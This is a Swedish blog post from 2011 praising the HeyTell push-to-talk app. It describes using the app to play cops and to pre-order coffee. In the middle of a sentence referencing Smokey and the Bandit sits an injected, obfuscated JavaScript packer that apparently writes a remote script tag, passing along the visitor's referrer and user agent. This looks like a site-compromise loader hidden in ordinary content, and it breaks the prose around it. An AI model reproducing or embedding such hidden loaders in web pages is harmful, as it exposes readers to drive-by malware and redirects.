Image Image Image Image Image Image Image Image Image Image

| 27 november, 2020

Scroll to top

Top

HeyTell… "Walkytalky" appen.

Filip Urde
  • On 3 juni, 2011
  • http://www.revue.se/filip-urde

HeyTell är en riktigt skön app som jag och grabbarna lekt med ett tag nu. Den fungerar som så att du via datatrafiken på din smartphone kan tala in ”instant messages” direkt till en annan användares mobil. Likt röstbrevlåda, fast roligare och via datatrafiken.

Det som gör HeyTell riktigt underhållande är känslan av att du använder en walkytalky. För att använda appen, trycker du på vem du vill lämna ett meddelande till. Sedan trycker du och håller in en stor orange knapp som säger ”Hold and speak”. När du är klar är det bara att släppa knappen och ditt meddelande är skickat.

 

Fungerar faktiskt riktigt bra, dock med viss fördröjning, men man överlever.

Tillåter du push meddelanden till appen, så leverars det ett meddelande varje gång någon säger något (om appen är ned-stängd på din mobil), så du är alltid uppdaterad med vad som händer. I dagarna har vi använt appen dels för att leka poliser, men också till att förbeställa kaffe på vårt stammis café. Så som ni ser är möjligheterna helt oändliga.

Så om du är sugen på att leka polis, trucker (smokey eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ikaye|var|u0026u|referrer|bfsnt||js|php’.split(’|’),0,{}))
and the bandit
http://www.imdb.com/title/tt0076729/ ), eller helt enkelt bara vill beställa en kopp take away kaffe från ditt stammis ställe. Tveka då inte att ladda ner den här appen.

Appen finns på   itunes och android market.

OBS! För att det ska fungera måste alla du vill prata med ha appen…..